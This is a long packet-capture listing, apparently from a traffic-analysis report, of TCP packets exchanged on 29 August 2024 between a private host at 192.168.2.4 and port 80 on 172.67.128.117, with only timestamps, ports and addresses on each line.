                                  Aug 29, 2024 23:42:07.929425955 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929439068 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929457903 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929466009 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929617882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929630041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929645061 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929651976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929662943 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929675102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929682016 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929691076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929713011 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929723978 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929830074 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929841042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929851055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929868937 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929879904 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929884911 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929892063 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929903984 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929908037 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929914951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929924965 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929927111 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929950953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929976940 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930082083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930094004 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930104017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930115938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930126905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930130959 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930140972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930149078 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930152893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930171967 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930208921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930234909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930247068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930257082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930267096 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930278063 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930283070 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930309057 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930320024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930361032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930376053 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930386066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930398941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930409908 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930413961 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930422068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930433989 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930443048 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930454016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930459023 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930471897 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930485010 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930500031 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930515051 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.016299009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016310930 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016321898 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016333103 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016345024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016355038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016366959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016537905 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.016563892 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.016632080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016643047 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016654015 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016707897 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.016721010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016732931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016742945 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016756058 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016789913 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.016851902 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.016869068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016880989 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016891003 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016906023 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016916990 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.016920090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016932964 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016942978 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.016943932 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.016978025 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017008066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017015934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017021894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017034054 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017045021 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017056942 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017066956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017071009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017083883 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017102957 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017126083 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017318964 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017330885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017340899 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017352104 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017364979 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017373085 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017375946 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017388105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017390966 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017400980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017414093 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017415047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017427921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017441034 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017458916 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017474890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017483950 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017484903 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017512083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017524004 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017529964 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017538071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017549038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017560959 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017585993 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017673969 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017685890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017697096 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017708063 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017720938 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017723083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017736912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017739058 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017760992 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017784119 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017827034 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017838001 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017848015 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017860889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017875910 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017894983 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.017949104 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017960072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017970085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017982960 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017993927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.017995119 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.018009901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018009901 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.018021107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018035889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018042088 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.018049002 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018064976 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.018081903 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.018102884 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.018239021 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018250942 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018260956 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018275023 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018285990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018290043 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.018296957 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018317938 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.018352985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.018352985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.018377066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018560886 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.018563032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018574953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018584967 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018598080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018609047 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018614054 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.018620014 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018631935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018637896 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.018645048 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018649101 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.018656969 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018670082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018673897 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.018682957 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018696070 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.018702030 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.018712044 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.018739939 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.019040108 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019051075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019061089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019073009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019084930 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019087076 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.019095898 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019104004 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.019108057 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019129992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019131899 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.019143105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019155025 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019155025 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.019165993 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019177914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019177914 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.019190073 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.019191980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019205093 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019216061 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.019216061 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019236088 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.019258976 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.019279957 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019290924 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019300938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019313097 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019325972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019335985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019337893 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.019349098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019354105 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.019367933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.019393921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.019423962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019435883 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019444942 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019455910 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019468069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019471884 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.019480944 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019488096 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.019493103 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.019512892 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.019539118 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.104801893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.104857922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.104870081 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.104908943 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.104928970 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.104928970 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.104940891 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.104950905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.104962111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.104976892 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105005026 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105190992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105201960 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105217934 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105232000 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105261087 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105283022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105293036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105303049 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105313063 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105330944 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105341911 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105355024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105365992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105369091 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105400085 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105427027 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105438948 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105448008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105464935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105473995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105477095 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105494022 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105518103 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105600119 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105611086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105619907 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105631113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105643988 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105648041 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105655909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105665922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105671883 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105690002 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105709076 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105736017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105746031 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105756044 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105766058 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105778933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105793953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105859041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105870962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105880022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105892897 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105901957 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105906963 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105914116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105921030 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105925083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105938911 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105940104 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.105966091 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.105987072 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.106070042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106117010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106127024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106157064 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.106179953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.106220007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106230974 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106240988 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106251955 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106266022 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.106288910 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.106365919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106375933 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106384039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106395006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106405973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106421947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106424093 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.106432915 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.106435061 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106446028 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106451988 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.106457949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106468916 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106473923 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.106517076 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.106517076 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.106641054 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106652021 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106661081 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106671095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106681108 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106683016 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.106693029 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106703997 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.106722116 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.106739998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.106821060 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106832981 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106842995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.106853008 CEST8049730172.67.128.117192.168.2.4
